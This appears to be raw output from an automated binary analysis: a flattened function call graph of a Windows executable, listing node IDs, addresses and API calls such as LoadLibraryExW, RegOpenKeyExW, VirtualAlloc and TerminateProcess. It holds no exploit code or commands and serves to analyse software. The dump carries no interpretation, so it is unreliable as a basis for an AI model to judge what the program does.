45623->45624 45626 b48163 45624->45626 45625->45622 45625->45625 45625->45626 45626->45619 45628 b142bc FindResourceExW 45627->45628 45632 b142d9 45627->45632 45629 b535ba LoadResource 45628->45629 45628->45632 45630 b535cf SizeofResource 45629->45630 45629->45632 45631 b535e3 LockResource 45630->45631 45630->45632 45631->45632 45632->45601 45643 b3e4e8 45633->45643 45636 b82792 _memcmp 45637 b82766 45636->45637 45638 b82792 45637->45638 45639 b827a6 45638->45639 45641 b827f3 45639->45641 45676 b827fa 45639->45676 45641->45608 45642->45608 45646 b3e469 45643->45646 45647 b3e478 45646->45647 45648 b3e48c 45646->45648 45660 b427ec 17 API calls __wsopen_s 45647->45660 45652 b3e488 45648->45652 45653 b4333f 45648->45653 45652->45636 45661 b42fd7 45653->45661 45656 b43372 45658 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 45656->45658 45657 b4337e GetSystemTimeAsFileTime 45657->45656 45659 b3e4a4 __alldvrm 45658->45659 45659->45652 45660->45652 45662 b43003 45661->45662 45663 b43007 45661->45663 45662->45663 45665 b43027 45662->45665 45669 b43073 45662->45669 45663->45656 45663->45657 45665->45663 45666 b43033 GetProcAddress 45665->45666 45667 b43056 45666->45667 45668 b43043 __crt_fast_encode_pointer 45666->45668 45667->45663 45668->45663 45670 b43094 LoadLibraryExW 45669->45670 45673 b43089 45669->45673 45671 b430b1 GetLastError 45670->45671 45672 b430c9 45670->45672 45671->45672 45675 b430bc LoadLibraryExW 45671->45675 45672->45673 45674 b430e0 FreeLibrary 45672->45674 45673->45662 45674->45673 45675->45672 45677 b82811 45676->45677 45678 b8284e _memcmp 45677->45678 45679 b82869 45677->45679 45678->45679 45679->45639 45681 b822e7 45680->45681 45682 b822d9 45680->45682 45684 b8232c 45681->45684 45685 b3e5eb 17 API calls 45681->45685 45696 b822f0 45681->45696 45683 b3e5eb 17 API calls 45682->45683 45683->45681 45709 b82557 45684->45709 45687 b82311 45685->45687 45687->45684 45689 b8231a 45687->45689 45688 b82370 45690 b82374 45688->45690 45691 b82395 45688->45691 45693 b3e678 23 API calls 45689->45693 45689->45696 45692 b82381 45690->45692 45695 b3e678 23 API calls 45690->45695 45713 b82171 45691->45713 45692->45696 45698 b3e678 23 API calls 45692->45698 45693->45696 45695->45692 45696->45581 45697 b8239d 45699 b823c3 45697->45699 45700 b823a3 45697->45700 45698->45696 45720 b823f3 45699->45720 45702 b823b0 45700->45702 45703 b3e678 23 API calls 45700->45703 45702->45696 45705 b3e678 23 API calls 45702->45705 45703->45702 45704 b823ca 45706 b823de 45704->45706 45728 b3e678 45704->45728 45705->45696 45706->45696 45708 b3e678 23 API calls 45706->45708 45708->45696 45710 b8257c 45709->45710 45712 b82565 45709->45712 45735 b3e8c4 45710->45735 45712->45688 45714 b3ea0c RtlAllocateHeap 45713->45714 45715 b8217f 45714->45715 45716 b3ea0c RtlAllocateHeap 45715->45716 45717 b82190 45716->45717 45718 b3ea0c RtlAllocateHeap 45717->45718 45719 b8219c 45718->45719 45719->45697 45727 b82408 45720->45727 45721 b824c0 45800 b82724 45721->45800 45722 b821cc 29 API calls 45722->45727 45724 b824c7 45724->45704 45727->45721 45727->45722 45727->45724 45796 b82606 45727->45796 45804 b82269 29 API calls 45727->45804 45729 b3e684 ___DestructExceptionObject 45728->45729 45730 b3e695 45729->45730 45732 b3e6aa 45729->45732 45858 b427ec 17 API calls __wsopen_s 45730->45858 45731 b3e6a5 __wsopen_s 45731->45706 45732->45731 45846 b3e602 45732->45846 45738 b3e8e1 45735->45738 45737 b3e8dc 45737->45712 45739 b3e8ed ___DestructExceptionObject 45738->45739 45740 b3e92d 45739->45740 45741 b3e900 ___scrt_fastfail 45739->45741 45744 b3e925 __fread_nolock __wsopen_s 45739->45744 45745 b3e6f8 45740->45745 45751 b427ec 17 API calls __wsopen_s 45741->45751 45744->45737 45747 b3e727 45745->45747 45749 b3e70a ___scrt_fastfail 45745->45749 45747->45744 45748 b3e717 ___scrt_fastfail 45787 b427ec 17 API calls __wsopen_s 45748->45787 45749->45747 45749->45748 45752 b48d45 45749->45752 45751->45744 45753 b48d6f 45752->45753 45754 b48d57 45752->45754 45753->45754 45755 b48def 45753->45755 45757 b48dbf 45753->45757 45754->45749 45758 b48e08 45755->45758 45759 b48e4a 45755->45759 45762 b48e2e 45755->45762 45795 b427ec 17 API calls __wsopen_s 45757->45795 45758->45762 45770 b48e15 45758->45770 45789 b43820 45759->45789 45761 b48e61 45763 b429c8 _free 2 API calls 45761->45763 45788 b427ec 17 API calls __wsopen_s 45762->45788 45764 b48e6a 45763->45764 45767 b429c8 _free 2 API calls 45764->45767 45766 b49029 45768 b4902d ReadFile 45766->45768 45767->45770 45771 b49047 45768->45771 45772 b490a1 GetLastError 45768->45772 45769 b48fcc GetConsoleMode 45769->45766 45773 b48fdd 45769->45773 45770->45766 45770->45769 45782 b48e45 __fread_nolock 45770->45782 45771->45772 45775 b4901e 45771->45775 45774 b490c5 45772->45774 45772->45782 45773->45768 45776 b48fe3 ReadConsoleW 45773->45776 45778 b49005 __dosmaperr 45774->45778 45774->45782 45780 b49083 45775->45780 45781 b4906c 45775->45781 45775->45782 45776->45775 45779 b48fff GetLastError 45776->45779 45777 b429c8 _free 2 API calls 45777->45754 45778->45782 45779->45778 45780->45782 45783 b4909a 45780->45783 45793 b48a61 ReadFile MultiByteToWideChar GetLastError __dosmaperr __fread_nolock 45781->45793 45782->45777 45794 b488a1 ReadFile 45783->45794 45786 b4909f 45786->45782 45787->45747 45788->45782 45790 b4385c 45789->45790 45792 b4382e 45789->45792 45790->45761 45791 b43849 RtlAllocateHeap 45791->45790 45791->45792 45792->45790 45792->45791 45793->45782 45794->45786 45795->45754 45797 b8261d 45796->45797 45798 b82617 45796->45798 45797->45727 45798->45797 45805 b826d7 45798->45805 45801 b82742 45800->45801 45802 b82731 45800->45802 45801->45724 45803 b3dbb3 21 API calls 45802->45803 45803->45801 45804->45727 45806 b82714 45805->45806 45807 b82703 45805->45807 45806->45798 45809 b3dbb3 45807->45809 45810 b3dbdd 45809->45810 45811 b3dbc1 45809->45811 45810->45806 45811->45810 45812 b3dbe3 45811->45812 45813 b3dbcd 45811->45813 45816 b3d9cc 45812->45816 45819 b427ec 17 API calls __wsopen_s 45813->45819 45820 b3d97b 45816->45820 45818 b3d9f0 45818->45810 45819->45810 45821 b3d987 ___DestructExceptionObject 45820->45821 45824 b3d9f4 45821->45824 45823 b3d9a2 __wsopen_s 45823->45818 45831 b449a1 45824->45831 45830 b3da2f 45830->45823 45832 b449b0 45831->45832 45833 b43820 __fread_nolock RtlAllocateHeap 45832->45833 45836 b3da09 45832->45836 45834 b44a15 45833->45834 45835 b429c8 _free HeapFree GetLastError 45834->45835 45835->45836 45837 b3da3a 45836->45837 45839 b3da4c 45837->45839 45841 b3da24 45837->45841 45838 b3da5a 45840 b427ec __wsopen_s 17 API calls 45838->45840 45839->45838 45839->45841 45843 b3da85 45839->45843 45840->45841 45845 b44a56 20 API calls 45841->45845 45842 b3dc0b 20 API calls 45842->45843 45843->45841 45843->45842 45844 b459be __wsopen_s 20 API calls 45843->45844 45844->45843 45845->45830 45847 b3e60f 45846->45847 45848 b3e624 45846->45848 45874 b427ec 17 API calls __wsopen_s 45847->45874 45852 b3e61f 45848->45852 45859 b3dc0b 45848->45859 45852->45731 45854 b3e640 45867 b4862f 45854->45867 45856 b3e64c 45856->45852 45857 b429c8 _free 2 API calls 45856->45857 45857->45852 45858->45731 45860 b3dc23 45859->45860 45862 b3dc1f 45859->45862 45860->45862 45875 b459be 45860->45875 45863 b44d7a 45862->45863 45864 b44d90 45863->45864 45866 b44da1 45863->45866 45865 b429c8 _free 2 API calls 45864->45865 45864->45866 45865->45866 45866->45854 45868 b48653 45867->45868 45872 b4863e 45867->45872 45869 b4867a 45868->45869 45870 b4868e 45868->45870 45900 b48607 45869->45900 45903 b427ec 17 API calls __wsopen_s 45870->45903 45872->45856 45874->45852 45877 b459ca ___DestructExceptionObject 45875->45877 45876 b459d2 __wsopen_s 45876->45862 45877->45876 45878 b45a88 45877->45878 45879 b45a1f 45877->45879 45897 b427ec 17 API calls __wsopen_s 45878->45897 45879->45876 45882 b45aa9 45879->45882 45883 b45ad7 45882->45883 45896 b45ad0 45882->45896 45884 b45afa 45883->45884 45887 b45adb 45883->45887 45888 b45b4b 45884->45888 45889 b45b2e 45884->45889 45885 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 45886 b45cb1 45885->45886 45886->45876 45898 b427ec 17 API calls __wsopen_s 45887->45898 45891 b45b6f 45888->45891 45893 b45c02 WriteFile 45888->45893 45899 b427ec 17 API calls __wsopen_s 45889->45899 45895 b45c60 __dosmaperr 45891->45895 45891->45896 45893->45891 45894 b45c25 GetLastError 45893->45894 45894->45891 45895->45896 45896->45885 45897->45876 45898->45896 45899->45896 45904 b48585 45900->45904 45902 b4862b 45902->45872 45903->45872 45905 b48591 ___DestructExceptionObject 45904->45905 45907 b485cc __wsopen_s 45905->45907 45908 b486ae 45905->45908 45907->45902 45909 b486be 45908->45909 45910 b486c4 45909->45910 45911 b48702 CloseHandle 45909->45911 45912 b48744 45910->45912 45913 b48738 __dosmaperr 45910->45913 45911->45910 45914 b4870e GetLastError 45911->45914 45912->45907 45913->45912 45914->45910 45915 b32c94 45916 b3334d 45915->45916 45917 b32c99 ___vcrt_initialize_winapi_thunks 45916->45917 45925 b33462 45917->45925 45920 b32ca7 45922 b32caf 45923 b32cb3 ___vcrt_uninitialize_locks 45922->45923 45924 b32cba 45922->45924 45923->45920 45926 b3346b 45925->45926 45928 b33494 ___vcrt_uninitialize_locks 45926->45928 45929 b32ca3 45926->45929 45937 b336ef 45926->45937 45928->45929 45929->45920 45930 b33414 45929->45930 45957 b33600 45930->45957 45933 b33429 45933->45922 45934 b3342c ___vcrt_FlsSetValue 45935 b33444 45934->45935 45936 b3343d ___vcrt_uninitialize_ptd 45934->45936 45935->45922 45936->45933 45942 b33591 45937->45942 45940 b33727 InitializeCriticalSectionAndSpinCount 45941 b33712 45940->45941 45941->45926 45943 b335b9 45942->45943 45949 b335b5 45942->45949 45943->45949 45950 b334cd 45943->45950 45946 b335d3 GetProcAddress 45947 b335f0 __crt_fast_encode_pointer 45946->45947 45948 b335e3 __crt_fast_encode_pointer 45946->45948 45947->45949 45948->45949 45949->45940 45949->45941 45955 b334dc try_get_first_available_module 45950->45955 45951 b33586 45951->45946 45951->45947 45952 b334f9 LoadLibraryExW 45953 b33514 GetLastError 45952->45953 45952->45955 45953->45955 45954 b3356f FreeLibrary 45954->45955 45955->45951 45955->45952 45955->45954 45956 b33547 LoadLibraryExW 45955->45956 45956->45955 45958 b33591 try_get_function 7 API calls 45957->45958 45959 b3361a 45958->45959 45960 b33633 TlsAlloc 45959->45960 45961 b3341e 45959->45961 45961->45933 45961->45934 45962 b13156 45965 b13170 45962->45965 45964 b1316a 45966 b13187 45965->45966 45967 b131eb 45966->45967 45968 b1318c 45966->45968 45989 b131b9 45966->45989 45970 b131f1 45967->45970 45975 b52dfb 45967->45975 45971 b13265 PostQuitMessage 45968->45971 45976 b13199 45968->45976 45969 b131d0 DefWindowProcW 45972 b131de 45969->45972 45973 b131f8 45970->45973 45974 b1321d SetTimer RegisterWindowMessageW 45970->45974 45971->45972 45972->45964 45980 b13201 KillTimer 45973->45980 45981 b52d9c 45973->45981 45974->45972 45977 b13246 CreatePopupMenu 45974->45977 45990 b2e499 VariantClear CharUpperBuffW __CxxThrowException __CxxThrowException RtlAllocateHeap 45975->45990 45978 b52e68 45976->45978 45979 b131ae 45976->45979 45976->45989 45977->45972 45992 b7c161 Shell_NotifyIconW KillTimer SetTimer ___scrt_fastfail 45978->45992 45979->45969 45979->45989 45991 b70ad7 __CxxThrowException __CxxThrowException RtlAllocateHeap 45979->45991 45980->45972 45983 b52dd7 MoveWindow 45981->45983 45984 b52da1 45981->45984 45983->45972 45986 b52dc6 SetFocus 45984->45986 45984->45989 45986->45972 45987 b52e77 45987->45972 45989->45969 45989->45972 45990->45989 45991->45989 45992->45987 45993 b4cabc 45994 b4cac5 45993->45994 45996 b4cace 45993->45996 45997 b4c9bb 45994->45997 46014 b42d74 GetLastError 45997->46014 45999 b4c9c8 46028 b4cada 45999->46028 46001 b4c9d0 46035 b4c74f 46001->46035 46004 b4c9e7 46004->45996 46005 b43820 __fread_nolock RtlAllocateHeap 46006 b4c9f8 46005->46006 46009 b4ca25 46006->46009 46042 b4cb7c 46006->46042 46008 b429c8 _free 2 API calls 46008->46004 46009->46008 46010 b4ca6e 46010->46009 46052 b4c625 HeapFree GetLastError 46010->46052 46011 b4ca1d 46011->46009 46011->46010 46012 b429c8 _free 2 API calls 46011->46012 46012->46010 46015 b42d8a 46014->46015 46016 b44c7d _unexpected RtlAllocateHeap 46015->46016 46017 b42ddf SetLastError 46015->46017 46019 b42da2 46016->46019 46017->45999 46018 b42daa 46020 b429c8 _free 2 API calls 46018->46020 46019->46018 46021 b42dc6 _unexpected 46019->46021 46022 b42db0 46020->46022 46025 b429c8 _free 2 API calls 46021->46025 46023 b42deb SetLastError 46022->46023 46053 b428a7 9 API calls _abort 46023->46053 46027 b42dd8 46025->46027 46027->46017 46027->46023 46029 b4cae6 ___DestructExceptionObject 46028->46029 46030 b42d74 _unexpected 15 API calls 46029->46030 46032 b4caf0 46030->46032 46031 b4cb74 __wsopen_s 46031->46001 46032->46031 46034 b429c8 _free 2 API calls 46032->46034 46054 b428a7 9 API calls _abort 46032->46054 46034->46032 46055 b349a5 46035->46055 46037 b4c761 46038 b4c770 GetOEMCP 46037->46038 46039 b4c782 46037->46039 46041 b4c799 46038->46041 46040 b4c787 GetACP 46039->46040 46039->46041 46040->46041 46041->46004 46041->46005 46043 b4c74f 17 API calls 46042->46043 46044 b4cb9b 46043->46044 46045 b4cba2 46044->46045 46048 b4cbec IsValidCodePage 46044->46048 46050 b4cc11 ___scrt_fastfail 46044->46050 46046 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46045->46046 46047 b4cd69 46046->46047 46047->46011 46048->46045 46049 b4cbfe GetCPInfo 46048->46049 46049->46045 46049->46050 46059 b4c827 GetCPInfo 46050->46059 46052->46009 46056 b349c2 46055->46056 46058 b349b8 46055->46058 46057 b42d74 _unexpected 15 API calls 46056->46057 46056->46058 46057->46058 46058->46037 46060 b4c861 46059->46060 46066 b4c90b 46059->46066 46067 b4641b 46060->46067 46061 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46063 b4c9b7 46061->46063 46063->46045 46065 b4641b 29 API calls 46065->46066 46066->46061 46068 b349a5 15 API calls 46067->46068 46069 b4642e 46068->46069 46072 b461fe 46069->46072 46073 b46219 46072->46073 46074 b4623f MultiByteToWideChar 46073->46074 46075 b463f6 46074->46075 46076 b46269 46074->46076 46077 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46075->46077 46081 b43820 __fread_nolock RtlAllocateHeap 46076->46081 46084 b4628a 46076->46084 46078 b46406 46077->46078 46078->46065 46079 b462d3 MultiByteToWideChar 46080 b4633f 46079->46080 46083 b462ec 46079->46083 46082 b463ed __freea 46080->46082 46081->46084 46082->46075 46097 b43467 46083->46097 46084->46079 46084->46080 46087 b46316 46087->46080 46087->46082 46090 b43467 12 API calls 46087->46090 46088 b4634e 46089 b43820 __fread_nolock RtlAllocateHeap 46088->46089 46092 b4636f 46088->46092 46089->46092 46090->46080 46091 b463e4 __freea 46091->46080 46092->46091 46093 b43467 12 API calls 46092->46093 46094 b463c3 46093->46094 46094->46091 46095 b463d2 WideCharToMultiByte 46094->46095 46095->46091 46096 b46412 __freea 46095->46096 46096->46082 46098 b42fd7 6 API calls 46097->46098 46099 b4348e 46098->46099 46100 b434d7 LCMapStringW 46099->46100 46101 b43497 46099->46101 46100->46101 46102 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46101->46102 46103 b434e9 46102->46103 46103->46080 46103->46087 46103->46088 46104 b303fb 46105 b30407 ___DestructExceptionObject 46104->46105 46106 b30561 46105->46106 46108 b30438 46105->46108 46143 b3083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46106->46143 46113 b30477 ___scrt_release_startup_lock 46108->46113 46128 b4247d 46108->46128 46110 b30568 46112 b30457 46115 b304a0 ___scrt_is_nonwritable_in_current_image 46113->46115 46116 b304ab 46113->46116 46115->46116 46117 b304c6 ___scrt_is_nonwritable_in_current_image 46116->46117 46118 b304d1 46116->46118 46117->46118 46136 b30959 46118->46136 46120 b304de 46121 b304f3 46120->46121 46140 b30992 GetModuleHandleW 46121->46140 46123 b304fa 46123->46110 46124 b30507 46123->46124 46141 b34df5 13 API calls 46123->46141 46142 b30040 ___vcrt_uninitialize_ptd ___vcrt_uninitialize_locks ___vcrt_uninitialize_winapi_thunks ___scrt_uninitialize_crt ___vcrt_uninitialize 46124->46142 46127 b3050f 46127->46112 46129 b42494 46128->46129 46130 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46129->46130 46131 b30451 46130->46131 46131->46112 46132 b42421 46131->46132 46133 b42450 46132->46133 46134 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46133->46134 46135 b42479 46134->46135 46135->46113 46144 b32340 46136->46144 46138 b3096c GetStartupInfoW 46139 b3097f 46138->46139 46139->46120 46140->46123 46141->46124 46142->46127 46143->46110 46144->46138 46145 b11098 46148 b142de 46145->46148 46147 b1109d pre_c_initialization 46149 b1a961 3 API calls 46148->46149 46150 b142f5 GetVersionExW 46149->46150 46151 b16b57 3 API calls 46150->46151 46163 b14342 46151->46163 46152 b1441b GetCurrentProcess IsWow64Process 46153 b14437 46152->46153 46154 b53824 GetSystemInfo 46153->46154 46155 b1444f LoadLibraryA 46153->46155 46156 b14460 GetProcAddress 46155->46156 46157 b1449c GetSystemInfo 46155->46157 46156->46157 46159 b14470 GetNativeSystemInfo 46156->46159 46160 b14476 46157->46160 46158 b537df 46159->46160 46161 b14481 46160->46161 46162 b1447a FreeLibrary 46160->46162 46161->46147 46162->46161 46163->46152 46163->46158 46164 b42e7d 46169 b43162 46164->46169 46167 b42e91 46170 b42fd7 6 API calls 46169->46170 46171 b43189 46170->46171 46172 b431a1 TlsAlloc 46171->46172 46173 b43192 46171->46173 46172->46173 46174 b30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46173->46174 46175 b42e87 46174->46175 46175->46167 46176 b42df8 6 API calls 2 library calls 46175->46176 46176->46167 46177 b1105b 46180 b1344d 46177->46180 46179 b1106a pre_c_initialization 46181 b1345d 46180->46181 46182 b1a961 3 API calls 46181->46182 46183 b13513 46182->46183 46184 b1a961 3 API calls 46183->46184 46185 b1354d 46184->46185 46196 b1a6c3 46185->46196 46187 b13556 RegOpenKeyExW 46188 b53176 RegQueryValueExW 46187->46188 46195 b13578 _wcslen 46187->46195 46189 b5320c RegCloseKey 46188->46189 46190 b53193 46188->46190 46189->46195 46191 b531b7 RegQueryValueExW 46190->46191 46192 b531d4 46191->46192 46194 b531ee 46191->46194 46193 b16b57 3 API calls 46192->46193 46193->46194 46194->46189 46195->46179 46197 b1a6d0 46196->46197 46198 b1a6dd 46196->46198 46197->46187 46199 b2fddb 3 API calls 46198->46199 46199->46197 46200 b1f7bf 46201 b1f7d3 46200->46201 46202 b1fcb6 46200->46202 46204 b1fcc2 46201->46204 46205 b2fddb 3 API calls 46201->46205 46241 b1aceb VariantClear 46202->46241 46242 b1aceb VariantClear 46204->46242 46207 b1f7e5 46205->46207 46207->46204 46208 b1f83e 46207->46208 46215 b1ed9d 46207->46215 46208->46215 46217 b21310 46208->46217 46210 b2fddb __CxxThrowException __CxxThrowException RtlAllocateHeap 46216 b1ec76 pre_c_initialization 46210->46216 46212 b30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 46212->46216 46213 b1a961 __CxxThrowException __CxxThrowException RtlAllocateHeap 46213->46216 46214 b301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 46214->46216 46216->46210 46216->46212 46216->46213 46216->46214 46216->46215 46240 b201e0 110 API calls _wcslen 46216->46240 46218 b217b0 46217->46218 46221 b21376 46217->46221 46393 b30242 5 API calls __Init_thread_wait 46218->46393 46219 b66331 46219->46216 46221->46219 46222 b217fb 46221->46222 46228 b213ec 46221->46228 46230 b2167b 46222->46230 46395 b1aceb VariantClear 46222->46395 46224 b217ba 46224->46222 46394 b301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 46224->46394 46226 b2fddb 3 API calls 46226->46228 46228->46226 46229 b2152f 46228->46229 46228->46230 46243 b1ec40 46228->46243 46229->46230 46236 b14f39 24 API calls 46229->46236 46251 b7d4ce 46229->46251 46254 b9e204 46229->46254 46269 b8f0ec 46229->46269 46273 b9959f 46229->46273 46276 b2effa 46229->46276 46312 b9958b 46229->46312 46315 b86ef1 46229->46315 46356 b8744a 46229->46356 46230->46216 46236->46229 46240->46216 46241->46204 46242->46215 46244 b1ec76 pre_c_initialization 46243->46244 46245 b301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 46244->46245 46246 b2fddb __CxxThrowException __CxxThrowException RtlAllocateHeap 46244->46246 46248 b30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 46244->46248 46249 b1a961 __CxxThrowException __CxxThrowException RtlAllocateHeap 46244->46249 46250 b1ed9d 46244->46250 46396 b201e0 110 API calls _wcslen 46244->46396 46245->46244 46246->46244 46248->46244 46249->46244 46250->46228 46397 b7dbbe lstrlenW 46251->46397 46255 b1a961 3 API calls 46254->46255 46256 b9e21b 46255->46256 46402 b16270 46256->46402 46258 b9e23d 46264 b9e2c2 46258->46264 46267 b9e2d9 46258->46267 46406 b16d25 __CxxThrowException __CxxThrowException RtlAllocateHeap 46258->46406 46260 b9e28d 46407 b16350 46260->46407 46264->46267 46415 b162b5 __CxxThrowException __CxxThrowException RtlAllocateHeap 46264->46415 46265 b9e2b4 46266 b16350 3 API calls 46265->46266 46266->46264 46267->46229 46270 b8f126 46269->46270 46271 b1ec40 110 API calls 46270->46271 46272 b8f15b 46270->46272 46271->46272 46272->46229 46422 b97f59 46273->46422 46275 b995af 46275->46229 46277 b2f012 46276->46277 46278 b2fddb 3 API calls 46277->46278 46280 b2f0a4 46277->46280 46279 b2f02b 46278->46279 46489 b16246 46279->46489 46289 b2f0b8 46280->46289 46470 b2fa5b 46280->46470 46283 b1a961 3 API calls 46284 b2f04f 46283->46284 46285 b16246 CloseHandle 46284->46285 46287 b2f056 46285->46287 46288 b16246 CloseHandle 46287->46288 46290 b2f06c 46288->46290 46292 b16270 3 API calls 46289->46292 46302 b6f127 46289->46302 46493 b15745 46290->46493 46294 b2f0db 46292->46294 46475 b2f141 46294->46475 46295 b6f0a0 46515 b16216 CloseHandle 46295->46515 46296 b2f085 46501 b153de 46296->46501 46299 b2f0ea 46299->46302 46512 b162b5 __CxxThrowException __CxxThrowException RtlAllocateHeap 46299->46512 46303 b2f0fe 46304 b2f138 46303->46304 46306 b16246 CloseHandle 46303->46306 46304->46229 46305 b2f093 46305->46280 46307 b6f069 46305->46307 46308 b2f12c 46306->46308 46514 b7ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 46307->46514 46308->46304 46513 b16216 CloseHandle 46308->46513 46310 b6f080 46310->46280 46313 b97f59 35 API calls 46312->46313 46314 b9959b 46313->46314 46314->46229 46316 b1a961 3 API calls 46315->46316 46317 b86f1d 46316->46317 46318 b1a961 3 API calls 46317->46318 46321 b86f26 _wcslen 46318->46321 46319 b870bf 46320 b14ecb 39 API calls 46319->46320 46322 b870d0 46320->46322 46321->46319 46328 b86fbc 46321->46328 46330 b870e9 46321->46330 46323 b870e5 46322->46323 46325 b14ecb 39 API calls 46322->46325 46324 b1a961 3 API calls 46323->46324 46323->46330 46326 b8711a 46324->46326 46325->46323 46327 b1a961 3 API calls 46326->46327 46331 b87126 46327->46331 46329 b87027 46328->46329 46335 b8700f 46328->46335 46333 b8703d 46329->46333 46330->46229 46332 b1a961 3 API calls 46331->46332 46334 b8712f 46332->46334 46571 b7e199 GetFileAttributesW 46333->46571 46337 b1a961 3 API calls 46334->46337 46338 b16350 3 API calls 46335->46338 46341 b87138 46337->46341 46338->46329 46339 b87050 46339->46330 46340 b871a9 46342 b16350 3 API calls 46340->46342 46341->46340 46343 b16b57 3 API calls 46341->46343 46344 b871c8 46342->46344 46345 b8719b 46343->46345 46346 b16350 3 API calls 46344->46346 46347 b16b57 3 API calls 46345->46347 46348 b871d6 46346->46348 46347->46340 46349 b16350 3 API calls 46348->46349 46350 b871e4 46349->46350 46351 b7d4ce 4 API calls 46350->46351 46352 b8720b 46351->46352 46353 b87239 46352->46353 46545 b82947 46352->46545 46355 b14f39 24 API calls 46353->46355 46355->46330 46357 b87469 46356->46357 46360 b1a961 3 API calls 46357->46360 46375 b87502 46357->46375 46358 b2fddb 3 API calls 46359 b87587 46358->46359 46363 b16246 CloseHandle 46359->46363 46361 b87495 46360->46361 46362 b1a961 3 API calls 46361->46362 46366 b8749e 46362->46366 46364 b875a3 46363->46364 46365 b1a961 3 API calls 46364->46365 46367 b875ab 46365->46367 46369 b16350 3 API calls 46366->46369 46368 b16246 CloseHandle 46367->46368 46370 b875b2 46368->46370 46371 b874f2 46369->46371 46373 b16246 CloseHandle 46370->46373 46372 b7d4ce 4 API calls 46371->46372 46371->46375 46372->46375 46374 b875c8 46373->46374 46376 b15745 5 API calls 46374->46376 46375->46358 46383 b876a4 46375->46383 46377 b875e2 46376->46377 46378 b876de GetLastError 46377->46378 46380 b875ea 46377->46380 46379 b876f7 46378->46379 46579 b16216 CloseHandle 46379->46579 46381 b153de 5 API calls 46380->46381 46388 b875f8 46381->46388 46383->46229 46384 b87645 46385 b2fddb 3 API calls 46384->46385 46387 b87679 46385->46387 46386 b87619 46577 b7ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 46386->46577 46390 b1a961 3 API calls 46387->46390 46388->46384 46388->46386 46391 b87686 46390->46391 46391->46383 46578 b7417d __CxxThrowException __CxxThrowException RtlAllocateHeap 46391->46578 46393->46224 46394->46222 46395->46230 46396->46244 46398 b7d4d5 46397->46398 46399 b7dbdc GetFileAttributesW 46397->46399 46398->46229 46399->46398 46400 b7dbe8 FindFirstFileW 46399->46400 46400->46398 46401 b7dbf9 FindClose 46400->46401 46401->46398 46403 b16295 46402->46403 46404 b2fddb 3 API calls 46403->46404 46405 b162a3 46404->46405 46405->46258 46406->46260 46408 b16362 46407->46408 46409 b54a51 46407->46409 46416 b16373 46408->46416 46421 b14a88 __CxxThrowException __CxxThrowException RtlAllocateHeap 46409->46421 46412 b1636e 46414 b16d25 __CxxThrowException __CxxThrowException RtlAllocateHeap 46412->46414 46413 b54a5b 46414->46265 46415->46267 46417 b16382 46416->46417 46418 b163a9 46416->46418 46417->46418 46419 b2fddb 3 API calls 46417->46419 46418->46412 46420 b54a91 46419->46420 46421->46413 46423 b97f90 46422->46423 46434 b97fd5 46423->46434 46446 b98cd3 46423->46446 46426 b98281 46426->46434 46456 b2fc70 46426->46456 46430 b982e8 46433 b982f3 GetCurrentProcess TerminateProcess 46430->46433 46431 b98302 46462 b163eb __CxxThrowException __CxxThrowException RtlAllocateHeap 46431->46462 46433->46431 46434->46275 46435 b98311 46445 b98352 46435->46445 46463 b204f0 __CxxThrowException __CxxThrowException RtlAllocateHeap 46435->46463 46437 b98049 46437->46426 46437->46434 46460 b7417d __CxxThrowException __CxxThrowException RtlAllocateHeap 46437->46460 46461 b9851d 24 API calls 46437->46461 46438 b984c5 46438->46434 46440 b984d9 FreeLibrary 46438->46440 46439 b98341 46464 b98b7b 8 API calls 46439->46464 46440->46434 46445->46438 46465 b204f0 __CxxThrowException __CxxThrowException RtlAllocateHeap 46445->46465 46466 b1aceb VariantClear 46445->46466 46467 b98b7b 8 API calls 46445->46467 46447 b1aec9 46446->46447 46448 b98cee CharLowerBuffW 46447->46448 46449 b98d0f 46448->46449 46451 b1a961 3 API calls 46449->46451 46455 b98d3e _wcslen 46449->46455 46452 b98d2a 46451->46452 46468 b16d25 __CxxThrowException __CxxThrowException RtlAllocateHeap 46452->46468 46453 b98e5e _wcslen 46453->46437 46455->46453 46469 b9851d 24 API calls 46455->46469 46457 b2fc85 46456->46457 46458 b2fd1d VirtualAlloc 46457->46458 46459 b2fceb 46457->46459 46458->46459 46459->46430 46459->46431 46460->46437 46461->46437 46462->46435 46463->46439 46464->46445 46465->46445 46466->46445 46467->46445 46468->46455 46469->46453 46516 b154c6 46470->46516 46473 b154c6 3 API calls 46474 b2fa9a 46473->46474 46474->46289 46476 b2f188 46475->46476 46477 b2f14c 46475->46477 46478 b1a6c3 3 API calls 46476->46478 46477->46476 